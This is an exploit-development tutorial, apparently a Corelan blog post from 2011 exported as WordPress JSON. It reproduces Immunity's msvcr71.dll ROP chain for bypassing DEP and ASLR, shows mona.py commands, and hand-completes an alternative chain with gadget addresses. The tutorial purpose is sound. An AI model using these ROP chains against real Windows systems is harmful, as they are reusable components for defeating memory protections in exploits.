{"id":7174,"date":"2011-07-03T13:53:05","date_gmt":"2011-07-03T11:53:05","guid":{"rendered":"https:\/\/www.corelan.be\/?p=7174"},"modified":"2011-07-03T13:53:05","modified_gmt":"2011-07-03T11:53:05","slug":"universal-depaslr-bypass-with-msvcr71-dll-and-mona-py","status":"publish","type":"post","link":"https:\/\/www.corelan.be\/index.php\/2011\/07\/03\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\/","title":{"rendered":"Universal DEP\/ASLR bypass with msvcr71.dll and mona.py"},"content":{"rendered":"

Introduction<\/h2>\n

Over the last few weeks, there has been some commotion<\/a> about a universal DEP\/ASLR bypass<\/a> routine  using ROP gadgets from msvcr71.dll and the fact that it might have been copied into an exploit submitted to Metasploit as part of the Metasploit bounty<\/a>.<\/p>\n

For the record, I don't know exactly what happened nor have I seen the proof... so I'm not going to make any statements about this or judge anyone.<\/p>\n

Furthermore, this post is not about the incident, but about the routine itself (which looks pretty slick) and alternative routines. <\/p>\n

The White Phosphorus version<\/h2>\n

Released as part of the White Phosphorus Exploit Pack, the routine only uses gadgets and pointer to VirtualProtect from msvcr71.dll.  That particular version of the dll does not rebase and is not ASLR enabled either, which makes it a perfect candidate for universal\/generic DEP & ASLR bypass, providing that it contains all required gadgets to perform a generic ROP routine.<\/p>\n

If your target application has that particular version of the dll loaded (or if you can force it to load one way or another), you can use the ROP chain to bypass DEP and ASLR in a generic way.<\/p>\n

Immunity Inc published the bypass technique on their website.  The routine looks like this :<\/p>\n

def<\/span> wp_sayonaraASLRDEPBypass(size=1000):\n    # White Phosphorus\n    # Sayonara Universal ASLR + DEP bypass for Windows [2003\/XP\/Vista\/7]\n    #\n    # This technique uses msvcr71.dll which has shipped unchanged\n    # in the Java Runtime Environment since v1.6.0.0 released\n    # December 2006.\n    #\n    # mail: support@whitephosphorus org\n    # sales: http:\/\/www.immunityinc.com\/products-whitephosphorus.shtml<\/span>\n\n    print<\/span> "WP> Building Sayonara - Universal ASLR and DEP bypass<\/span>"\n\n    size += 4  # bytes to shellcode after pushad esp ptr\n\n    depBypass = pack<\/span>('<L', 0x7C344CC1)  # pop eax;ret;\n    depBypass += pack<\/span>('<L', 0x7C3410C2) # pop ecx;pop ecx;ret;\n    depBypass += pack<\/span>('<L', 0x7C342462) # xor<\/span> chain; call eax {0x7C3410C2}\n    depBypass += pack<\/span>('<L', 0x7C38C510) # writeable location for lpflOldProtect\n    depBypass += pack<\/span>('<L', 0x7C365645) # pop esi;ret;\n    depBypass += pack<\/span>('<L', 0x7C345243) # ret;\n    depBypass += pack<\/span>('<L', 0x7C348F46) # pop ebp;ret;\n    depBypass += pack<\/span>('<L', 0x7C3487EC) # call eax \n    depBypass += pack<\/span>('<L', 0x7C344CC1) # pop eax;ret; \n    depBypass += pack<\/span>("<i<\/span>", -size)      # {size}\n    depBypass += pack<\/span>('<L', 0x7C34D749) # neg<\/span> eax;ret; {adjust size}\n    depBypass += pack<\/span>('<L', 0x7C3458AA) # add<\/span> ebx, eax;ret; {size into ebx}\n    depBypass += pack<\/span>('<L', 0x7C3439FA) # pop edx;ret; \n    depBypass += pack<\/span>('<L', 0xFFFFFFC0) # {flag}\n    depBypass += pack<\/span>('<L', 0x7C351EB1) # neg<\/span> edx;ret; {adjust flag}\n    depBypass += pack<\/span>('<L', 0x7C354648) # pop edi;ret;\n    depBypass += pack<\/span>('<L', 0x7C3530EA) # mov eax,[eax];ret;\n    depBypass += pack<\/span>('<L', 0x7C344CC1) # pop eax;ret;\n    depBypass += pack<\/span>('<L', 0x7C37A181) # (VP RVA + 30) - {0xEF adjustment}\n    depBypass += pack<\/span>('<L', 0x7C355AEB) # sub<\/span> eax,30;ret;\n    depBypass += pack<\/span>('<L', 0x7C378C81) # pushad; add<\/span> al,0xef; ret;\n    depBypass += pack<\/span>('<L', 0x7C36683F) # push<\/span> esp;ret;\n\n    print<\/span> "WP> Universal Bypass Size: %d bytes<\/span>"%len(depBypass)\n    return<\/span> depBypass<\/pre>\n
(22 dwords)<\/p>\n
Triggered by the Metasploit bounty "incident", the fact that Abysssec published a post\/document<\/a> just a few hours ago, and because Immunity already released the routine, I decided to take a look myself & see if there would be another way to build an alternative DEP\/ASLR Bypass routine from msvcr71.dll.<\/p>\n
The alternative version (mona.py)<\/h2>\n
I attached Immunity Debugger to an application that has the dll loaded, and used mona.py<\/a> to create a database with rop gadgets & have it produce a rop chain.  <\/p>\n
Since the one written part of White Phosporus doesn't have any null bytes, I will try to do the same thing.<\/p>\n
This is the result :<\/p>\n
Command used :<\/p>\n
!mona rop -m msvcr71.dll -n<\/pre>\n
17 seconds<\/strong> later, I got this :<\/p>\n
rop_gadgets = \n\t[\n\t\t0x7c346c0a,\t# POP EAX # RETN (msvcr71.dll)\n\t\t0x7c37a140,\t# <- *&VirtualProtect() \n\t\t0x7c3530ea,\t# MOV EAX,DWORD PTR DS:[EAX] # RETN (msvcr71.dll)\n\t\t0x????????,\t# ** <- find<\/span> routine to move virtualprotect() into esi\n\t\t           \t# ** Hint : look for mov [esp+offset],eax and pop esi\n\t\t0x7c376402,\t# POP EBP # RETN (msvcr71.dll)\n\t\t0x7c345c30,\t# ptr to 'push<\/span> esp #  ret ' (from msvcr71.dll)\n\t\t0x7c346c0a,\t# POP EAX # RETN (msvcr71.dll)\n\t\t0xfffffdff,\t# value to negate, target value : 0x00000201, target: ebx\n\t\t0x7c351e05,\t# NEG EAX # RETN (msvcr71.dll)\n\t\t0x7c354901,\t# POP EBX # RETN (msvcr71.dll)\n\t\t0xffffffff,\t# pop value into ebx\n\t\t0x7c345255,\t# INC EBX # FPATAN # RETN (msvcr71.dll)\n\t\t0x7c352174,\t# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (msvcr71.dll)\n\t\t0x7c34d201,\t# POP ECX # RETN (msvcr71.dll)\n\t\t0x7c38b001,\t# RW pointer (lpOldProtect) (-> ecx)\n\t\t0x7c34b8d7,\t# POP EDI # RETN (msvcr71.dll)\n\t\t0x7c34b8d8,\t# ROP NOP (-> edi)\n\t\t0x7c344f87,\t# POP EDX # RETN (msvcr71.dll)\n\t\t0xffffffc0,\t# value to negate, target value : 0x00000040, target: edx\n\t\t0x7c351eb1,\t# NEG EDX # RETN (msvcr71.dll)\n\t\t0x7c346c0a,\t# POP EAX # RETN (msvcr71.dll)\n\t\t0x90909090,\t# NOPS (-> eax)\n\t\t0x7c378c81,\t# PUSHAD # ADD AL,0EF # RETN (msvcr71.dll)\n\t# rop chain generated by mona.py\n\t# note : this chain may not work out of the box\n\t# you may have to change order or fix<\/span> some gadgets,\n\t# but it should give you a head start<\/span>\n\t].pack<\/span>("V*<\/span>")<\/pre>\n
It is slightly larger than the one written by Immunity (so yes, the one part of WP is most likely better), but I just wanted to see if there was an alternative available.<\/p>\n
The only thing that is missing from the one mona generated, is a routine that would put the VirtualProtect() (in eax) into esi.<\/p>\n
mona.py didn't find any obvious gadgets that would simply do something such as "mov esi,eax", so I had to manually search for an alternative.<\/p>\n
But as mona.py suggested, I simply had to find a gadget that would write the value in eax onto the stack, so you can pick it up in esi later on.<\/p>\n
In order to do so, you probably need 2 or 3 gadgets : one to get the stack pointer, a second one to write the value onto the stack and a third one to pick it up (pop esi).<\/p>\n
After searching the generated rop.txt file for a few minutes, I found the following 2 gadgets that will do this :<\/p>\n
0x7c37591f<\/strong> :  # PUSH ESP<\/strong> # ADD EAX,DWORD PTR DS:[EAX] # ADD CH,BL # INC EBP # OR AL,59 # POP ECX<\/strong> # POP EBP # RETN    <\/p>\n
0x7c376069<\/strong> :  # MOV DWORD PTR DS:[ECX+1C],EAX<\/strong> # POP EDI # POP ESI<\/strong> # POP EBX # RETN   <\/p>\n
That should work.  <\/p>\n
Using those 2 gadgets, we can simply write the pointer to VirtualProtect() onto the stack and pick it up in ESI. In fact, the second gadget will write and pick up in the same gadget. We just need to make ECX point at the correct location on the stack and make sure POP ESI will take it from that location.<\/p>\n
Note that the first gadget requires EAX to contain a valid pointer to a readable location.  So all we would have to do to make it readable is pop a readable address from msvcr71.dll into EAX first.<\/p>\n
Putting all of this together, the chain looks like this :<\/p>\n
rop_gadgets = \n[\n\t0x7c346c0a,\t# POP EAX # RETN (MSVCR71.dll)\n\t0x7c37a140,\t# Make EAX readable\t\t\t\n\t0x7c37591f,\t# PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)\n\t0x41414141,\t# EBP (filler)\n\t0x7c346c0a,\t# POP EAX # RETN (MSVCR71.dll)\n\t0x7c37a140,\t# <- *&VirtualProtect() \n\t0x7c3530ea,\t# MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)\n\t0x7c346c0b,\t# Slide, so next gadget would write<\/span> to correct stack<\/span> location\n\t0x7c376069,\t# MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)\n\t0x41414141,\t# EDI (filler)\n       \t0x41414141,\t# will be patched at runtime (VP), then picked up into ESI\n       \t0x41414141,\t# EBX (filler)\n\t0x7c376402,\t# POP EBP # RETN (msvcr71.dll)\n\t0x7c345c30,\t# ptr to 'push<\/span> esp #  ret ' (from MSVCR71.dll)\n\t0x7c346c0a,\t# POP EAX # RETN (MSVCR71.dll)\n\t0xfffffdff,\t# size 0x00000201 -> ebx, modify if<\/span> needed\n\t0x7c351e05,\t# NEG EAX # RETN (MSVCR71.dll)\n\t0x7c354901,\t# POP EBX # RETN (MSVCR71.dll)\n\t0xffffffff,\t# pop value into ebx\n\t0x7c345255,\t# INC EBX # FPATAN # RETN (MSVCR71.dll)\n\t0x7c352174,\t# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)\n\t0x7c34d201,\t# POP ECX # RETN (MSVCR71.dll)\n\t0x7c38b001,\t# RW pointer (lpOldProtect) (-> ecx)\n\t0x7c34b8d7,\t# POP EDI # RETN (MSVCR71.dll)\n\t0x7c34b8d8,\t# ROP NOP (-> edi)\n\t0x7c344f87,\t# POP EDX # RETN (MSVCR71.dll)\n\t0xffffffc0,\t# value to negate, target value : 0x00000040, target: edx\n\t0x7c351eb1,\t# NEG EDX # RETN (MSVCR71.dll)\n\t0x7c346c0a,\t# POP EAX # RETN (MSVCR71.dll)\n\t0x90909090,\t# NOPS (-> eax)\n\t0x7c378c81,\t# PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)\n\t# rop chain generated with mona.py\n].pack<\/span>("V*<\/span>")<\/pre>\n
31 dwords...  9 dwords larger than the commercial one from White Phosphorus...  but it proves my point.   It took me less than 10 minutes to build this chain, it's universal and bypasses DEP and ASLR.<\/p>\n
Oh, by the way, in case you didn't know...  if you have other bad chars (so let's say you also need to avoid using '\\x0a' and '\\x0d') then you could just run<\/p>\n
!mona rop -m msvcr71.dll -n -cpb '\\x0a\\x0d'<\/pre>\n
and get other pointers... yes, it's that simple.  <\/p>\n
 <\/p>\n
Conclusion <\/h2>\n
no matter how nice & 'tempting' a certain solution looks like, there always might be an alternative, and creativity often leads to results.<\/p>\n
 <\/p>\n
\n","protected":false},"excerpt":{"rendered":"
Over the last few weeks, there has been some commotion about a universal DEP\/ASLR bypass routine using ROP gadgets from msvcr71.dll (written by Immunity Inc) and the fact that it might have been copied into an exploit submitted to Metasploit as part of the Metasploit bounty.<\/p>\n
I'm not going to make any statements about this, but the ROP routine itself looks pretty slick.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[244,245,127],"tags":[3733,2802,2339,2331,2128,1919,1853,1824,261],"class_list":["post-7174","post","type-post","status-publish","format-standard","hentry","category-exploit-writing-tutorials","category-exploits","category-security","tag-exploit-development-tutorial","tag-mona-py","tag-rop","tag-gadget","tag-immunity-debugger","tag-aslr","tag-dep","tag-metasploit","tag-corelan"],"yoast_head":"\nUniversal DEP\/ASLR bypass with msvcr71.dll and mona.py - Corelan | Exploit Development & Vulnerability Research<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.corelan.be\/index.php\/2011\/07\/03\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Universal DEP\/ASLR bypass with msvcr71.dll and mona.py - Corelan | Exploit Development & Vulnerability Research\" \/>\n<meta property=\"og:description\" content=\"Over the last few weeks, there has been some commotion about a universal DEP\/ASLR bypass routine using ROP gadgets from msvcr71.dll (written by Immunity Inc) and the fact that it might have been copied into an exploit submitted to Metasploit as part of the Metasploit bounty. I'm not going to make any statements about this, but the ROP routine itself looks pretty slick.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.corelan.be\/index.php\/2011\/07\/03\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\/\" \/>\n<meta property=\"og:site_name\" content=\"Corelan | Exploit Development & Vulnerability Research\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/corelanconsulting\" \/>\n<meta property=\"article:published_time\" content=\"2011-07-03T11:53:05+00:00\" \/>\n<meta name=\"author\" content=\"corelanc0d3r\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@corelanc0d3r\" \/>\n<meta name=\"twitter:site\" content=\"@corelanc0d3r\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"TechArticle\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2011\\\/07\\\/03\\\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2011\\\/07\\\/03\\\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\\\/\"},\"author\":{\"name\":\"corelanc0d3r\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\"},\"headline\":\"Universal DEP\\\/ASLR bypass with msvcr71.dll and mona.py\",\"datePublished\":\"2011-07-03T11:53:05+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2011\\\/07\\\/03\\\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\\\/\"},\"wordCount\":781,\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"keywords\":[\"exploit development tutorial\",\"mona.py\",\"rop\",\"gadget\",\"immunity debugger\",\"aslr\",\"dep\",\"metasploit\",\"corelan\"],\"articleSection\":[\"Exploit Writing Tutorials\",\"Exploits\",\"Security\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2011\\\/07\\\/03\\\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2011\\\/07\\\/03\\\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\\\/\",\"name\":\"Universal DEP\\\/ASLR bypass with msvcr71.dll and mona.py - Corelan | Exploit Development & Vulnerability Research\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\"},\"datePublished\":\"2011-07-03T11:53:05+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2011\\\/07\\\/03\\\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2011\\\/07\\\/03\\\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2011\\\/07\\\/03\\\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.corelan.be\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Universal DEP\\\/ASLR bypass with msvcr71.dll and mona.py\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"name\":\"Corelan CyberSecurity Research\",\"description\":\"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals worldwide.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.corelan.be\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\",\"name\":\"Corelan CyberSecurity Research\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"contentUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"width\":200,\"height\":200,\"caption\":\"Corelan CyberSecurity Research\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/corelanconsulting\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\",\"https:\\\/\\\/x.com\\\/corelanconsulting\",\"https:\\\/\\\/instagram.com\\\/corelanconsult\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\",\"name\":\"corelanc0d3r\",\"pronouns\":\"he\\\/him\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"caption\":\"corelanc0d3r\"},\"description\":\"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.\",\"sameAs\":[\"https:\\\/\\\/www.corelan-training.com\",\"https:\\\/\\\/instagram.com\\\/corelanc0d3r\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/petervaneeckhoutte\\\/\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\"],\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/author\\\/admin0\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Universal DEP\/ASLR bypass with msvcr71.dll and mona.py - Corelan | Exploit Development & Vulnerability Research","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.corelan.be\/index.php\/2011\/07\/03\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\/","og_locale":"en_US","og_type":"article","og_title":"Universal DEP\/ASLR bypass with msvcr71.dll and mona.py - Corelan | Exploit Development & Vulnerability Research","og_description":"Over the last few weeks, there has been some commotion about a universal DEP\/ASLR bypass routine using ROP gadgets from msvcr71.dll (written by Immunity Inc) and the fact that it might have been copied into an exploit submitted to Metasploit as part of the Metasploit bounty. I'm not going to make any statements about this, but the ROP routine itself looks pretty slick.","og_url":"https:\/\/www.corelan.be\/index.php\/2011\/07\/03\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\/","og_site_name":"Corelan | Exploit Development & Vulnerability Research","article_publisher":"https:\/\/www.facebook.com\/corelanconsulting","article_published_time":"2011-07-03T11:53:05+00:00","author":"corelanc0d3r","twitter_card":"summary_large_image","twitter_creator":"@corelanc0d3r","twitter_site":"@corelanc0d3r","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"TechArticle","@id":"https:\/\/www.corelan.be\/index.php\/2011\/07\/03\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\/#article","isPartOf":{"@id":"https:\/\/www.corelan.be\/index.php\/2011\/07\/03\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\/"},"author":{"name":"corelanc0d3r","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f"},"headline":"Universal DEP\/ASLR bypass with msvcr71.dll and mona.py","datePublished":"2011-07-03T11:53:05+00:00","mainEntityOfPage":{"@id":"https:\/\/www.corelan.be\/index.php\/2011\/07\/03\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\/"},"wordCount":781,"publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"keywords":["exploit development tutorial","mona.py","rop","gadget","immunity debugger","aslr","dep","metasploit","corelan"],"articleSection":["Exploit Writing Tutorials","Exploits","Security"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.corelan.be\/index.php\/2011\/07\/03\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\/","url":"https:\/\/www.corelan.be\/index.php\/2011\/07\/03\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\/","name":"Universal DEP\/ASLR bypass with msvcr71.dll and mona.py - Corelan | Exploit Development & Vulnerability Research","isPartOf":{"@id":"https:\/\/www.corelan.be\/#website"},"datePublished":"2011-07-03T11:53:05+00:00","breadcrumb":{"@id":"https:\/\/www.corelan.be\/index.php\/2011\/07\/03\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.corelan.be\/index.php\/2011\/07\/03\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.corelan.be\/index.php\/2011\/07\/03\/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.corelan.be\/"},{"@type":"ListItem","position":2,"name":"Universal DEP\/ASLR bypass with msvcr71.dll and mona.py"}]},{"@type":"WebSite","@id":"https:\/\/www.corelan.be\/#website","url":"https:\/\/www.corelan.be\/","name":"Corelan CyberSecurity Research","description":"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals worldwide.","publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.corelan.be\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.corelan.be\/#organization","name":"Corelan CyberSecurity Research","url":"https:\/\/www.corelan.be\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/","url":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","contentUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","width":200,"height":200,"caption":"Corelan CyberSecurity Research"},"image":{"@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/corelanconsulting","https:\/\/x.com\/corelanc0d3r","https:\/\/x.com\/corelanconsulting","https:\/\/instagram.com\/corelanconsult"]},{"@type":"Person","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f","name":"corelanc0d3r","pronouns":"he\/him","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","url":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","caption":"corelanc0d3r"},"description":"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.","sameAs":["https:\/\/www.corelan-training.com","https:\/\/instagram.com\/corelanc0d3r","https:\/\/www.linkedin.com\/in\/petervaneeckhoutte\/","https:\/\/x.com\/corelanc0d3r"],"url":"https:\/\/www.corelan.be\/index.php\/author\/admin0\/"}]}},"views":38867,"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/7174","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/comments?post=7174"}],"version-history":[{"count":0,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/7174\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/media?parent=7174"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/categories?post=7174"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/tags?post=7174"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
Interesting... mona.py<\/a> generated an almost complete ROP chain using gadgets using pointers from msvcr71.dll.  <\/p>\n